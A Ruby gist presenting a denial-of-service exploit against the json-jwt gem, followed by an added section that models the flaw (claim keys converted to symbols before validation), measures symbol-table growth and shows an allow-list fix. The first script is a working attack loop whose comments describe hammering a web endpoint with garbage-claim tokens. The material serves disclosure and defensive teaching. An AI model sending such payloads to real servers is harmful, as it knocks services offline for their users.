JSON::JWT DOS exploit
require 'json/jwt'

p GC.stat # note heap_used, heap_length, and particularly heap_live_num
          # (Ruby 2.1 key names; Ruby 2.2 and later report heap_live_slots instead)

random = Random.new
key    = random.bytes(256 / 8)

10_000.times do
  # construct a hash with 10_000 garbage keys; they can be strings here and the
  # JWT decoder will happily convert them to symbols regardless (the random
  # bytes are hex-encoded so every key serializes as valid JSON text)
  claims = 10_000.times.each_with_object({}) do |_, h|
    h[ random.bytes(16).unpack('H*').first ] = 1
  end

  # convert it to a JWT; they don't even have to be signed, because the decoder
  # converts string keys to symbols before even validating the JWT
  jwt = JSON::JWT.new(claims)

  # we swallow errors because, in practice, an attacker can just repeatedly hit
  # your webserver endpoint and ignore the fact that you've failed to decode the
  # JWT
  JSON::JWT.decode(jwt.to_s, key) rescue nil
end

# let the above run as long as you feel like
GC.start
p GC.stat # note heap_used, heap_length, and particularly heap_live_num
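The following is an added example and not part of the gist or of the json-jwt gem. It models the decoder behaviour the gist's comments describe (every string claim key turned into a Symbol before the token is validated) without depending on json-jwt, measures the symbol-table growth directly with Symbol.all_symbols instead of GC.stat, and puts the allow-list conversion a decoder should use beside it. KNOWN_CLAIMS, the function names and the garbage-claims helper are this example's own assumptions; the claim names in the allow-list are the registered claims from RFC 7519. One caveat for anyone re-running the gist today: since Ruby 2.2, symbols created at runtime with String#to_sym are garbage-collected once nothing references them, so on a modern interpreter the table no longer grows without bound. The measurement below keeps the converted hash alive so the growth is visible; the allow-list variant adds no symbols on any Ruby version.

```ruby
require 'securerandom'

# Registered claim names from RFC 7519 section 4.1. This allow-list is an
# assumption of this example; a real decoder would extend it with the
# application claims it actually reads, and nothing else.
KNOWN_CLAIMS = %w[iss sub aud exp nbf iat jti].freeze

# Vulnerable pattern: every key the client sent becomes a Symbol, so each
# unseen claim name allocates a new entry in the interpreter's symbol table.
def symbolize_all(claims)
  claims.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
end

# Hardened pattern: only allow-listed names are symbolized; anything else stays
# a String, so attacker-controlled input cannot populate the symbol table.
def symbolize_known(claims)
  claims.each_with_object({}) do |(k, v), h|
    h[KNOWN_CLAIMS.include?(k) ? k.to_sym : k] = v
  end
end

# Constructed payload of the kind the gist sends: n random garbage claim names,
# hex-encoded so they would survive JSON serialization as object keys.
def garbage_claims(n)
  n.times.each_with_object({}) { |_, h| h[SecureRandom.hex(16)] = 1 }
end

# Run a converter over a garbage payload and report how many symbols were added
# to the symbol table. The converted hash is returned as well, so the symbols it
# references stay alive (and countable) until the caller drops it.
def symbol_growth(n, &converter)
  claims = garbage_claims(n)
  before = Symbol.all_symbols.size
  converted = converter.call(claims)
  after = Symbol.all_symbols.size
  {
    new_symbols: after - before,
    symbol_keys: converted.keys.count { |k| k.is_a?(Symbol) },
    converted: converted
  }
end

if __FILE__ == $PROGRAM_NAME
  n = 10_000
  all   = symbol_growth(n) { |c| symbolize_all(c) }
  known = symbol_growth(n) { |c| symbolize_known(c) }
  puts "symbolize_all:   #{all[:new_symbols]} new symbols for #{n} garbage claims"
  puts "symbolize_known: #{known[:new_symbols]} new symbols for #{n} garbage claims"
end
```

The allow-list check is the whole fix: a decoder only needs Symbol keys for the claims it looks up by name, so there is no reason to intern a key it has never heard of. If the application also wants to reject tokens carrying unexpected claims, that decision can be made on the String keys before any conversion happens.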